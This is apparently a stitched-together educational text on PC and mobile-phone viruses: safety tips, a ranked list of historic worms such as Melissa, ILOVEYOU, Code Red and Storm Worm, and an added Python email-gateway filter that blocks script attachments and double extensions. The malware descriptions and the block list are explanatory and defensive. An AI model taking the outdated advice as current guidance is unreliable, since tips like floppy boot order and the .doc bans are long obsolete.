When this section was originally written there was no virus that infected mobile phones, despite media stories and hoaxes; that changed in 2004 with Cabir, listed in 9.4. There had, however, been viruses that send messages to phones. For example, VBS/Timo-A, a worm that spreads itself by email, also uses the modem to send text (SMS) messages to selected mobile numbers. The notorious Love Bug virus is also capable of forwarding text to fax machines and mobiles. These viruses cannot infect or harm the mobile phone itself. You can already access internet-like sites and services on the new generation of mobiles and the technology is developing fast. As it becomes easier to transfer data, even on the move, the risk is that new security threats will emerge too.
9.1 WAP phones and viruses
WAP provides internet-type information and services for mobile phones and organizers. It is based on the same model as web communications, i.e. a central server delivers code that is run by a browser on your phone. So, at the moment, the possibilities for viruses are very limited. A virus could infect the server itself, but the chances for it to spread or to have an effect on users would be minimal. First, there is nowhere on a WAP system that a virus can copy itself or survive. Unlike a PC, a WAP phone does not store applications. The phone downloads the code it needs and keeps no copy, except temporarily in the browser cache. Second, a virus cannot yet spread from one user to another because there is no communication between client phones.
9.2 Bluetooth-Bugs
Bluetooth is a standard for low-power radio data communication over very short distances. Computers, mobiles, fax machines and even domestic appliances, such as video recorders, can use Bluetooth to discover what services are provided by other nearby devices and establish transparent links with them. Software that uses Bluetooth is currently emerging. The worry is that an unauthorized user, or malicious code, could exploit Bluetooth to interfere with these services.
9.3. Palmtop computers, PDAs-can they be infected by computer viruses?
Palmtop computers or personal digital assistants (PDAs) are likely to provide new opportunities for viruses in the very near future. Palmtops or PDAs run specially written or scaled-down operating systems, such as EPOC, PalmOS and PocketPC (formerly Windows CE). Such systems will eventually be able to use versions of popular desktop applications, making them vulnerable to malicious code in the same way as desktop machines. In early 2001, there were already viruses that affect the Palm system. Palmtops are also regularly connected to home or office PCs to synchronise the data on the two machines (e.g. address book information or calendars). Such data synchronisation could allow viruses to spread easily. No-one yet knows which will be more successful in the future: mobile computers or smart mobile phones. Whichever it is, the security risks will increase as mobile computers become better at communicating.
There is a virus called Palm/Phage, which can infect Palm OS, but it is not in the wild and poses little threat. Palm/Liberty-A is a Trojan for Palm OS that deletes Palm OS applications; it too poses little risk.
9.4. Some mobile phone viruses…
§ VBS/Timo-A and Love Bug: PC viruses that use the modem or email to send SMS messages to mobile phones; they do not infect the phone itself.
§ Cabir: arrives as a Symbian installation file (.SIS) and affects Symbian Series 60 phones. It spreads to nearby phones over Bluetooth; its main effect is battery drain from continuous Bluetooth scanning rather than corruption of system files.
§ "ACE-?" / "UNAVAILABLE": a hoax, not a virus. A widely forwarded warning claimed that a text message with this subject would erase all IMEI and IMSI information from both the phone and the SIM card, leaving the phone unable to connect to the network so the owner would have to buy a new phone, that Motorola and Nokia had confirmed it, and that over 3 million phones in the USA were infected. No such virus existed; the warning is a chain letter of the kind described in section 9 and in item b of section 10, and should not be forwarded.
§ Timofonica: this virus was designed to send prank messages to cell phones on the Telefonica cellular network, which operates in Spain. It worked like this: victims received it as an email attachment on their home or work computers. When a user opened the infected attachment, the virus, plus a message critical of Telefonica, was sent to every email address in their address book. The virus also caused each victim's computer to send a text message to a randomly selected cell phone on Telefonica's network. Timofonica did not harm cell phones any more than a wrong-number call damages any phone.
9.5. Mobile phone virus-precautions
§ Scanning at a gateway or during data transfer: In the near future, the best way to protect mobile devices may be to check data when you transfer it to or from them. For mobile phones, for example, the WAP gateway might be a good place to install virus protection: all communications pass through this gateway in unencrypted form, so it is an ideal opportunity for virus scanning. For palmtop computers, you could use virus protection when the palmtop is synchronizing data with a conventional PC.
§ Virus scanning on the mobile device: As mobile devices become more interconnected, it will become difficult to police data transfer at a central point. The solution will be to put anti-virus software on each device, once they have sufficient processing power and memory.
§ Enable Bluetooth only when it is needed: Disable Bluetooth if it is not in use. This prevents the phone from being reached by a Bluetooth worm and also makes the battery last longer, as Bluetooth consumes a lot of power. If you have to keep it on, at least keep it in non-discoverable (hidden) mode so that other devices cannot find it by scanning.
§ Don't install unexpected applications: If your Bluetooth is on and you are receiving a file, be alert. Accept only the files you are expecting, and never agree to install a program you did not ask for.
§ Never download cell phone applications from file sharing networks: It is strongly recommended to scan every cell phone application, even one downloaded from an official web site, with antivirus software on your computer. Some PC antivirus products do detect cell phone viruses.
STEPS TO SAFER COMPUTING
10. STEPS TO SAFER COMPUTING
a. Don't use documents in .doc and .xls format: Save your Word documents in RTF (Rich Text Format) and your Excel spreadsheets as CSV (Comma Separated Values) files. These formats don't support macros, so they cannot spread macro viruses, which are by far the commonest virus threat. Ask other people to supply you with RTF and CSV files. Beware that some macro viruses intercept File/Save As RTF and save the file in DOC format under an .rtf extension, so the extension alone is no guarantee. To be absolutely safe, use text-only files. Don't launch unsolicited programs or documents: if you don't know that something is virus-free, assume it isn't.
b. Forward warnings to one authorized person only: Hoaxes are as big a problem as viruses themselves. Tell users not to forward virus warnings to their friends, colleagues or everyone in their address book. Have a company policy that all warnings go to one named person or department only.
c. Block files with double extensions at the gateway: Some viruses disguise the fact that they are programs by using a 'double extension', such as .TXT.VBS, after their filename. At first glance a file like LOVE-LETTER-FOR-YOU.TXT.VBS or ANNAKOURNIKOVA.JPG.VBS may seem to be a harmless text file or a graphic, and because Windows Explorer hides known extensions by default the user may see only the .TXT or .JPG part. Any file with a double extension should be blocked at the email gateway.
d. Block unwanted file types at the email gateway: Many viruses now use VBS (Visual Basic Script) and Windows scrap object (SHS) file types to spread. It is unlikely that your organization needs to receive these file types from outside, so block them at the email gateway.
e. Change your computer’s boot up sequence: Most computers try to boot from floppy disk (the A: drive) first. Your IT staff should change the CMOS settings so that the computer boots from the hard disk by default. Then, even if an infected floppy is left in the computer, it cannot be infected by a boot sector virus. If you need to boot from floppy at any time, you can have the settings changed back.
f. Write-protect floppies before giving them to other users: A write-protected floppy cannot be infected.
g. Subscribe to an email alert service: An alert service can warn you about new viruses and offer virus identities that will enable your anti-virus software to detect them. Sophos has a free alert service.
h. Make regular backups of all programs and data: If you are infected with a virus, you will be able to restore any lost programs and data.
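Steps c and d above (block double extensions and unwanted script types at the email gateway) are simple enough to implement directly. The following Python script is an added example, not part of the original text or of any gateway product: it parses a message with the standard library's email module, extracts every attachment filename and blocks it if it carries a blocked script or executable type or a double extension. The blocked-type list extends the page's VBS and SHS with other Windows types that run on double-click, the compound-extension allowlist (.tar.gz and friends) is my own addition to avoid an obvious false positive, and the sample message is constructed here.

```python
"""Email gateway attachment filter: block script types and double extensions.

Added example, not from the original page. The extension lists are this
example's own choices; the sample message is constructed below.
"""
import email
from email import policy
from email.message import EmailMessage

# Types the gateway refuses outright. The page names VBS and SHS; the rest are
# other Windows types that execute when opened (assumption: extend the list).
BLOCKED_EXTENSIONS = {"vbs", "vbe", "shs", "shb", "js", "jse", "wsf", "wsh",
                      "exe", "scr", "pif", "com", "bat", "cmd"}
# Compound extensions that are legitimately "double" (assumption: allow these).
ALLOWED_COMPOUND = {"tar.gz", "tar.bz2", "tar.xz"}


def classify_filename(name: str) -> tuple:
    """Return ("allow"|"block", reason) for one attachment filename."""
    # Drop any path component, squeeze out whitespace padding (used to push the
    # real extension out of view), strip stray dots and lower-case the result.
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    cleaned = "".join(base.split()).strip(".").lower()
    parts = cleaned.split(".")
    if len(parts) < 2:
        return ("allow", "no extension")
    exts = parts[1:]
    last = exts[-1]
    if last in BLOCKED_EXTENSIONS:
        return ("block", f"blocked file type .{last}")
    if len(exts) >= 2 and ".".join(exts[-2:]) not in ALLOWED_COMPOUND:
        return ("block", "double extension")
    return ("allow", "ok")


def scan_message(raw: bytes) -> list:
    """Classify every attachment in a raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        filename = part.get_filename()
        if not filename:
            continue  # inline body text, not an attachment
        verdict, reason = classify_filename(filename)
        findings.append((filename, verdict, reason))
    return findings


def build_sample(filename: str, payload: bytes) -> bytes:
    """Constructed test message carrying one attachment."""
    msg = EmailMessage()
    msg["From"] = "friend@example.com"
    msg["To"] = "victim@example.com"
    msg["Subject"] = "ILOVEYOU"
    msg.set_content("kindly check the attached LOVELETTER coming from me.")
    msg.add_attachment(payload, maintype="application",
                       subtype="octet-stream", filename=filename)
    return msg.as_bytes()


if __name__ == "__main__":
    for name in ("LOVE-LETTER-FOR-YOU.TXT.vbs", "notes.txt.doc", "backup.tar.gz"):
        print(name, scan_message(build_sample(name, b"payload")))
```

The filter deliberately judges the filename, not the declared Content-Type, because the sender controls both and the filename is what the recipient's mail client acts on. Whitespace is collapsed before classification because padding a name like "photo.jpg" with spaces before the real extension is a known trick for hiding it in narrow attachment panes.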
10 WORST COMPUTER VIRUSES
11. 10 WORST COMPUTER VIRUSES
Worst computer Virus 10 : Melissa
In the spring of 1999, a man named David L. Smith created a computer virus based on a Microsoft Word macro. He built the virus so that it could spread through e-mail messages. Smith named the virus "Melissa," saying that he named it after an exotic dancer from Florida [source: CNN].
Rather than shaking its moneymaker, the Melissa computer virus tempts recipients into opening a document with an e-mail message like "Here is that document you asked for, don't show it to anybody else." Once activated, the virus replicates itself and sends itself out to the top 50 people in the recipient's e-mail address book.
The virus spread rapidly after Smith unleashed it on the world. The United States federal government became very interested in Smith's work -- according to statements made by FBI officials to Congress, the Melissa virus "wreaked havoc on government and private sector networks" [source: FBI]. The increase in e-mail traffic forced some companies to discontinue e-mail programs until the virus was contained.
Smith pleaded guilty and received a 20-month jail sentence. The court also fined Smith $5,000 and forbade him from accessing computer networks without court authorization [source: BBC]. Ultimately, the Melissa virus didn't cripple the Internet, but it was one of the first computer viruses to get the public's attention.
Flavors of Viruses
In this article, we'll look at several different kinds of computer viruses. Here's a quick guide to what we'll see:
The general term computer virus usually covers programs that modify how a computer works (including damaging the computer) and can self-replicate. A true computer virus requires a host program to run properly -- Melissa used a Word document.
A worm, on the other hand, doesn't require a host program. It's an application that can replicate itself and send itself through computer networks.
Trojan horses are programs that claim to do one thing but really do another. Some might damage a victim's hard drive. Others can create a backdoor, allowing a remote user to access the victim's computer system.
Next, we'll look at a virus that had a sweet name but a nasty effect on its victims.
Worst Computer Virus 9: “ ILOVEYOU ”
A year after the Melissa virus hit the Internet, a digital menace emerged from the Philippines. Unlike the Melissa virus, this threat came in the form of a worm -- it was a standalone program capable of replicating itself. It bore the name ILOVEYOU.
The ILOVEYOU virus initially traveled the Internet by e-mail, just like the Melissa virus. The subject of the e-mail said that the message was a love letter from a secret admirer. An attachment in the e-mail was what caused all the trouble. The original worm had the file name of LOVE-LETTER-FOR-YOU.TXT.vbs. The vbs extension pointed to the language the hacker used to create the worm: Visual Basic Scripting [source: McAfee].
According to anti-virus software producer McAfee, the ILOVEYOU virus had a wide range of attacks:
It copied itself several times and hid the copies in several folders on the victim's hard drive.
It added registry Run keys so that its copies were started every time Windows booted.
It replaced several different kinds of files with copies of itself.
It sent itself through Internet Relay Chat clients as well as e-mail.
It downloaded a file called WIN-BUGSFIX.EXE from the Internet and executed it. Rather than fix bugs, this program was a password-stealing application that e-mailed secret information to the hacker's e-mail address.
Who created the ILOVEYOU virus? Some think it was Onel de Guzman of the Philippines. Filipino authorities investigated de Guzman on charges of theft -- at the time the Philippines had no computer espionage or sabotage laws. Citing a lack of evidence, the Filipino authorities dropped the charges against de Guzman, who would neither confirm nor deny his responsibility for the virus. According to some estimates, the ILOVEYOU virus caused $10 billion in damages.
Gotcha!
As if viruses, worms and Trojan horses weren't enough, we also have to worry about virus hoaxes. These are fake viruses -- they don't actually cause any harm or replicate themselves. Instead, the creators of these viruses hope that people and media companies treat the hoax as if it were the real deal. Even though these hoaxes aren't immediately dangerous, they are still a problem. Like the boy who cried wolf, hoax viruses can cause people to ignore warnings about real threats.
Now that the love fest is over, let's take a look at one of the most widespread viruses to hit the Web.
Worst Computer Virus 8: “ The Klez Virus “
The Klez virus marked a new direction for computer viruses, setting the bar high for those that would follow. It debuted in late 2001, and variations of the virus plagued the Internet for several months. The basic Klez worm infected a victim's computer through an e-mail message, replicated itself and then sent itself to people in the victim's address book. Some variations of the Klez virus carried other harmful programs that could render a victim's computer inoperable. Depending on the version, the Klez virus could act like a normal computer virus, a worm or a Trojan horse. It could even disable virus-scanning software and pose as a virus-removal tool.
Shortly after it appeared on the Internet, hackers modified the Klez virus in a way that made it far more effective. Like other viruses, it could comb through a victim's address book and send itself to contacts. But it could also take another name from the contact list and place that address in the "From" field in the e-mail client. It's called spoofing -- the e-mail appears to come from one source when it's really coming from somewhere else.
Spoofing an e-mail address accomplishes a couple of goals. For one thing, it doesn't do the recipient of the e-mail any good to block the person in the "From" field, since the e-mails are really coming from someone else. A Klez worm programmed to spam people with multiple e-mails could clog an inbox in short order, because the recipients would be unable to tell what the real source of the problem was. Also, the e-mail's recipient might recognize the name in the "From" field and therefore be more receptive to opening it.
Antivirus Software
It's important to have an antivirus program on your computer, and to keep it up to date. But you shouldn't use more than one suite, as multiple antivirus programs can interfere with one another. Here's a list of some antivirus software suites:
Avast Antivirus
AVG Anti-Virus
Kaspersky Anti-Virus
McAfee VirusScan
Norton AntiVirus
Several major computer viruses debuted in 2001. In the next section, we'll take a look at Code Red.
Worst Computer Virus 7: “ Code Red and Code Red II ”
The Code Red and Code Red II worms popped up in the summer of 2001. Both worms exploited a vulnerability in Microsoft's IIS web server (the Indexing Service ISAPI extension, patched in MS01-033) on machines running Windows NT 4.0 and Windows 2000. The vulnerability was a buffer overflow: the server copied an over-long request into a fixed-size memory buffer, so the excess overwrote adjacent memory and data supplied by the attacker ended up being executed as code.
The original Code Red worm initiated a distributed denial of service (DDoS) attack on the White House. That means all the computers infected with Code Red tried to contact the Web servers at the White House at the same time, overloading the machines.
A Windows 2000 machine infected by the Code Red II worm no longer obeys the owner. That's because the worm creates a backdoor into the computer's operating system, allowing a remote user to access and control the machine. In computing terms, this is a system-level compromise, and it's bad news for the computer's owner. The person behind the virus can access information from the victim's computer or even use the infected computer to commit crimes. That means the victim not only has to deal with an infected computer, but also may fall under suspicion for crimes he or she didn't commit.
While Windows NT machines were vulnerable to the Code Red worms, the viruses' effect on these machines wasn't as extreme. Web servers running Windows NT might crash more often than normal, but that was about as bad as it got. Compared to the woes experienced by Windows 2000 users, that's not so bad.
Microsoft released software patches that addressed the security vulnerability in Windows 2000 and Windows NT. Once patched, the original worms could no longer infect a Windows 2000 machine; however, the patch didn't remove viruses from infected computers -- victims had to do that themselves.
What do I do now?
What should you do if you find out your computer has been hit with a computer virus? That depends on the virus. Many antivirus programs are able to remove viruses from an infected system. But if the virus has damaged some of your files or data, you'll need to restore from backups. It's very important to back up your information often. And with viruses like the Code Red worms, it's a good idea to completely reformat the hard drive and start fresh. Some worms allow other malicious software to load onto your machine, and a simple antivirus sweep might not catch them all.
Worst Computer Virus 6: Nimda
Another virus to hit the Internet in 2001 was the Nimda (which is admin spelled backwards) worm. Nimda spread through the Internet rapidly, becoming the fastest propagating computer virus at that time. In fact, according to TruSecure CTO Peter Tippett, it only took 22 minutes from the moment Nimda hit the Internet to reach the top of the list of reported attacks.
The Nimda worm's primary targets were Internet servers. While it could infect a home PC, its real purpose was to bring Internet traffic to a crawl. It could travel through the Internet using multiple methods, including e-mail. This helped spread the virus across multiple servers in record time.
The Nimda worm created a backdoor into the victim's operating system. It allowed the person behind the attack to access the same level of functions as whatever account was logged into the machine currently. In other words, if a user with limited privileges activated the worm on a computer, the attacker would also have limited access to the computer's functions. On the other hand, if the victim was the administrator for the machine, the attacker would have full control.
The spread of the Nimda virus caused some network systems to crash as more of the system's resources became fodder for the worm. In effect, the Nimda worm became a distributed denial of service (DDoS) attack.
Phoning it In
Not all computer viruses focus on computers. Some target other electronic devices. Here's just a small sample of some highly portable viruses:
CommWarrior attacked smartphones running the Symbian operating system (OS).
The Skulls Virus also attacked Symbian phones and displayed screens of skulls instead of a home page on the victims' phones.
RavMonE.exe is a virus that could infect iPod MP3 devices made between Sept. 12, 2006, and Oct. 18, 2006.
Fox News reported in March 2008 that some electronic gadgets leave the factory with viruses pre-installed -- these viruses attack your computer when you sync the device with your machine .
Worst Computer Virus 5: “ SQL Slammer/Sapphire “
In late January 2003, a new worm spread across the Internet, this time aimed at database servers rather than web servers. Many computer networks were unprepared for the attack, and the traffic it generated brought down several important systems. Bank of America's ATM service crashed, the city of Seattle suffered outages in 911 service and Continental Airlines had to cancel several flights due to electronic ticketing and check-in errors.
The culprit was the SQL Slammer worm, also known as Sapphire. It exploited a buffer overflow in the resolution service of Microsoft SQL Server 2000 and MSDE (UDP port 1434), for which a patch had been available for six months. By some estimates, the worm caused more than $1 billion in damages before the remaining systems were patched and antivirus software caught up with the problem [source: Lemos]. The progress of Slammer's attack is well documented. The whole worm fit in a single 376-byte UDP packet, so an infected host could spray copies at random addresses as fast as its network link allowed; the number of infected hosts doubled roughly every 8.5 seconds, and about 90 percent of vulnerable hosts were infected within ten minutes of the first one.
The Slammer worm taught a valuable lesson: a patch only helps once it is actually installed, and a worm that spreads in seconds leaves no time for people to react. Keeping systems patched and antivirus software current is still necessary, but it is equally important to limit exposure in the first place (the SQL resolution service had no business being reachable from the Internet) and to have a worst-case-scenario plan to fall back on should disaster strike.
A Matter of Timing
Some hackers program viruses to sit dormant on a victim's computer only to unleash an attack on a specific date. Here's a quick sample of some famous viruses that had time triggers:
The Jerusalem virus activated every Friday the 13th to destroy data on the victim computer's hard drive
The Michelangelo virus activated on March 6, 1992 -- Michelangelo was born on March 6, 1475
The Chernobyl virus activated on April 26, 1999 -- the 13th anniversary of the Chernobyl meltdown disaster
The Nyxem virus delivered its payload on the third of every month, wiping out files on the victim's computer
Worst Computer Virus 4: “ MyDoom “
The MyDoom (or Novarg) virus is another worm that can create a backdoor in the victim computer's operating system. The original MyDoom virus -- there have been several variants -- had two triggers. One trigger caused the virus to begin a denial of service (DoS) attack starting Feb. 1, 2004. The second trigger commanded the virus to stop distributing itself on Feb. 12, 2004. Even after the virus stopped spreading, the backdoors created during the initial infections remained active.
Later that year, a second outbreak of the MyDoom virus gave several search engine companies grief. Like other viruses, MyDoom searched victim computers for e-mail addresses as part of its replication process. But it would also send a search request to a search engine and use e-mail addresses found in the search results. Eventually, search engines like Google began to receive millions of search requests from corrupted computers. These attacks slowed down search engine services and even caused some to crash.
MyDoom spread through e-mail and peer-to-peer networks. According to the security firm MessageLabs, one in every 12 e-mail messages carried the virus at one time. Like the Klez virus, MyDoom could spoof e-mails so that it became very difficult to track the source of the infection.
Oddball Viruses
Not all viruses cause severe damage to computers or destroy networks. Some just cause computers to act in odd ways. An early virus called Ping-Pong created a bouncing ball graphic, but didn't seriously damage the infected computer. There are several joke programs that might make a computer owner think his or her computer is infected, but they're really harmless applications that don't self-replicate. When in doubt, it's best to let an antivirus program remove the application.
Worst Computer Virus 3: “Sasser and Netsky“
Sometimes computer virus programmers escape detection. But once in a while, authorities find a way to track a virus back to its origin. Such was the case with the Sasser and Netsky viruses. A 17-year-old German named Sven Jaschan created the two programs and unleashed them onto the Internet. While the two worms behaved in different ways, similarities in the code led security experts to believe they both were the work of the same person.
The Sasser worm attacked computers through a vulnerability in the Windows LSASS service (patched in MS04-011). Unlike Netsky, it didn't spread through e-mail. Instead, once the worm infected a computer, it scanned random IP addresses for other vulnerable systems, exploited them over the network and instructed them to download the worm. The exploit crashed the LSASS service on the victim, which triggered a forced shutdown countdown, so infected machines kept rebooting themselves and were difficult to use until the worm was removed.
The Netsky virus moves through e-mails and Windows networks. It spoofs e-mail addresses and propagates through a 22,016-byte file attachment. As it spreads, it can cause a denial of service (DoS) attack as systems collapse while trying to handle all the Internet traffic. At one time, security experts at Sophos believed Netsky and its variants accounted for 25 percent of all computer viruses on the Internet.
Sven Jaschan spent no time in jail; he received a sentence of one year and nine months of probation. Because he was under 18 at the time of his arrest, he avoided being tried as an adult in German courts.
Black Hats
Just as you'd find good and bad witches in Oz, you can find good and bad hackers in our world. One common term for a hacker who sets out to create computer viruses or compromise system security is a black hat. Some hackers attend conventions like the Black Hat conference or Defcon to discuss the impact of black hats and how they use vulnerabilities in computer security systems to commit crimes.
So far, most of the viruses we've looked at target PCs running Windows. But Macintosh computers aren't immune to computer virus attacks. In the next section, we'll take a look at the first virus to commit a Mac attack.
Worst Computer Virus 2: ” Leap-A/Oompa-A ”
Maybe you've seen the ad in Apple's Mac computer marketing campaign where Justin "I'm a Mac" Long consoles John "I'm a PC" Hodgman. Hodgman comes down with a virus and points out that there are more than 100,000 viruses that can strike a computer. Long says that those viruses target PCs, not Mac computers.
For the most part, that's true. Mac computers are partially protected from virus attacks because of a concept called security through obscurity. Apple has a reputation for keeping its operating system (OS) and hardware a closed system -- Apple produces both the hardware and the software. This keeps the OS obscure. Traditionally, Macs have been a distant second to PCs in the home computer market. A hacker who creates a virus for the Mac won't hit as many victims as he or she would with a virus for PCs.
But that hasn't stopped at least one Mac hacker. In 2006, the Leap-A virus, also known as Oompa-A, debuted. It uses the iChat instant messaging program to propagate across vulnerable Mac computers. After the virus infects a Mac, it searches through the iChat contacts and sends a message to each person on the list. The message contains a corrupted file that appears to be an innocent JPEG image.
The Leap-A virus doesn't cause much harm to computers, but it does show that even a Mac computer can fall prey to malicious software. As Mac computers become more popular, we'll probably see more hackers create customized viruses that could damage files on the computer or snarl network traffic. Hodgman's character may yet have his revenge.
Breaking into Song
While computer viruses can pose a serious threat to computer systems and Internet traffic, sometimes the media overstates the impact of a particular virus. For example, the Michelangelo virus gained a great deal of media attention, but the actual damage caused by the virus was pretty small. That might have been the inspiration for the song "Virus Alert" by "Weird Al" Yankovic. The song warns listeners of a computer virus called Stinky Cheese that not only wipes out your computer's hard drive, but also forces you to listen to Jethro Tull songs and legally change your name to Reggie.
Worst Computer Virus 1: “ Storm Worm ”
The latest virus on our list is the dreaded Storm Worm. Computer security experts first identified the worm in January 2007. The public began to call it the Storm Worm because one of the e-mail messages carrying it had as its subject "230 dead as storm batters Europe", referring to a real storm that hit Europe that week. Antivirus companies call the worm other names. For example, Symantec calls it Peacomm while McAfee refers to it as Nuwar. This might sound confusing, but there's already a 2001 virus called W32.Storm.Worm. The 2001 virus and the 2007 worm are completely different programs.
The Storm Worm is a Trojan horse program. Its payload is another program, though not always the same one. Some versions of the Storm Worm turn computers into zombies or bots. As computers become infected, they become vulnerable to remote control by the person behind the attack. Some hackers use the Storm Worm to create a botnet and use it to send spam mail across the Internet.
Many versions of the Storm Worm fool the victim into downloading the application through fake links to news stories or videos. The people behind the attacks will often change the subject of the e-mail to reflect current events. For example, just before the 2008 Olympics in Beijing, a new version of the worm appeared in e-mails with subjects like "a new deadly catastrophe in China" or "China's most deadly earthquake." The e-mail claimed to link to video and news stories related to the subject, but in reality clicking on the link activated a download of the worm to the victim's computer [source: McAfee].
Several news agencies and blogs named the Storm Worm one of the worst virus attacks in years. By July 2007, an official with the security company Postini claimed that the firm detected more than 200 million e-mails carrying links to the Storm Worm during an attack that spanned several days [source: Gaudin]. Fortunately, not every e-mail led to someone downloading the worm.
Although the Storm Worm is widespread, it's not the most difficult virus to detect or remove from a computer system. If you keep your antivirus software up to date and remember to use caution when you receive e-mails from unfamiliar people or see strange links, you'll save yourself some major headaches.
Malware
Computer viruses are just one kind of malware. Other types include spyware and some kinds of adware. Spyware spies on what a user does with his or her computer. That can include logging keystrokes as a way to discover login codes and passwords. Adware is a software app that displays ads to users while they use a larger application like a Web browser. Some adware contains code that gives advertisers extensive access to private information.
CELL PHONE VIRUS
12. Cell-phone Virus
12.1 BASICS
That Thing with Paris Hilton's Phone: Remember when someone got his hands on Paris Hilton's star-studded contact list? It was not the result of a virus, and nobody hacked into Hilton's phone. Mobile phone operators' servers hold on to certain types of information, such as contact lists (in case the user's phone locks up) and recent calls (for billing purposes). The enterprising hacker got into T-Mobile's servers and stole the information from there.
A cell-phone virus is basically the same thing as a computer virus -- an unwanted executable file that "infects" a device and then copies itself to other devices. But whereas a computer virus or worm spreads through e-mail attachments and Internet downloads, a cell-phone virus or worm spreads via Internet downloads, MMS (multimedia messaging service) attachments and Bluetooth transfers. The most common type of cell-phone infection right now occurs when a cell phone downloads an infected file from a PC or the Internet, but phone-to-phone viruses are on the rise.
Current phone-to-phone viruses almost exclusively infect phones running the Symbian operating system. The large number of proprietary operating systems in the cell-phone world is one of the obstacles to mass infection. Cell-phone-virus writers have no Windows-level market share to target, so any virus will only affect a small percentage of phones.
Infected files usually show up disguised as applications like games, security patches, add-on functionalities and, of course, pornography and free stuff. Infected text messages sometimes steal the subject line from a message you've received from a friend, which of course increases the likelihood of your opening it -- but opening the message isn't enough to get infected. You have to choose to open the message attachment and agree to install the program, which is another obstacle to mass infection: To date, no reported phone-to-phone virus auto-installs. The installation obstacles and the methods of spreading limit the amount of damage the current generation of cell-phone virus can do.
12.2 How They Spread
Phones that can only make and receive calls are not at risk. Only smartphones with a Bluetooth connection and data capabilities can receive a cell-phone virus. These viruses spread primarily in three ways:
Internet downloads - The virus spreads the same way a traditional computer virus does. The user downloads an infected file to the phone by way of a PC or the phone's own Internet connection. This may include file-sharing downloads, applications available from add-on sites (such as ringtones or games) and false security patches posted on the Symbian Web site.
Bluetooth wireless connection - The virus spreads between phones by way of their Bluetooth connection. The user receives a virus via Bluetooth when the phone is in discoverable mode, meaning it can be seen by other Bluetooth-enabled phones. In this case, the virus spreads like an airborne illness. According to TechnologyReview.com, cell-phone-virus researchers at F-Secure's U.S. lab now conduct their studies in a bomb shelter so their research topics don't end up spreading to every Bluetooth-enabled phone in the vicinity.
Multimedia Messaging Service - The virus is an attachment to an MMS text message. As with computer viruses that arrive as e-mail attachments, the user must choose to open the attachment and then install it in order for the virus to infect the phone. Typically, a virus that spreads via MMS gets into the phone's contact list and sends itself to every phone number stored there.
In all of these transfer methods, the user has to agree at least once (and usually twice) to run the infected file. But cell-phone-virus writers get you to open and install their product the same way computer-virus writers do: The virus is typically disguised as a game, security patch or other desirable application.
12.3 The Damage Done
The first known cell-phone virus, Cabir, is entirely innocuous. All it does is sit in the phone and try to spread itself. Other cell-phone viruses, however, are not as harmless.
A virus might access and/or delete all of the contact information and calendar entries in your phone. It might send an infected MMS message to every number in your phone book -- and MMS messages typically cost money to send, so you're actually paying to send a virus to all of your friends, family members and business associates. On the worst-case-scenario end, it might delete or lock up certain phone applications or crash your phone completely so it's useless. Some reported viruses and their vital statistics are listed below.
Cell-phone Viruses: Cabir.A, Skulls.A, Commwarrior.A, Locknut.B, Fontal.A
The Commwarrior virus arrived on the scene in January 2005 and is the first cell-phone virus to effectively spread through an entire company via Bluetooth (see ComputerWorld.com: Phone virus spreads through Scandinavian company). It replicates by way of both Bluetooth and MMS. Once you receive and install the virus, it immediately starts looking for other Bluetooth phones in the vicinity to infect. At the same time, the virus sends infected MMS messages to every phone number in your address list. Commwarrior is probably one of the more effective viruses to date because it uses two methods to replicate itself.
12.4 Protecting Your Phone
The best way to protect yourself from cell-phone viruses is the same way you protect yourself from computer viruses: Never open anything if you don't know what it is, haven't requested it or have any suspicions whatsoever that it's not what it claims to be. That said, even the most cautious person can still end up with an infected phone. Here are some steps you can take to decrease your chances of installing a virus:
Turn off Bluetooth discoverable mode. Set your phone to "hidden" so other phones can't detect it and send it the virus. You can do this on the Bluetooth options screen.
Check security updates to learn about filenames you should keep an eye out for. It's not foolproof -- the Commwarrior program generates random names for the infected files it sends out, so users can't be warned not to open specific filenames -- but many viruses can be easily identified by the filenames they carry. Security sites with detailed virus information include:
Some of these sites will send you e-mail updates with new virus information as it gets posted.
Install some type of security software on your phone. Numerous companies are developing security software for cell phones, some for free download, some for user purchase and some intended for cell-phone service providers. The software may simply detect and then remove the virus once it's received and installed, or it may protect your phone from getting certain viruses in the first place. Symbian has developed an anti-virus version of its operating system that only allows the phone's Bluetooth connection to accept secure files.
Although some in the cell-phone industry think the potential problem is overstated, most experts agree that cell-phone viruses are on the brink of becoming genuinely destructive. Installing a "security patch" that ends up turning your phone into a useless piece of plastic is definitely something to be concerned about, but it could still get worse. Future possibilities include viruses that bug phones -- so someone can see every number you call and listen to your conversations -- and viruses that steal financial information, which would be a serious issue if smartphones end up being used as payment devices (see Bankrate.com: Paying by cell phone on the way). Ultimately, more connectivity means more exposure to viruses and faster spreading of infection. As smartphones become more common and more complex, so will the viruses that target them.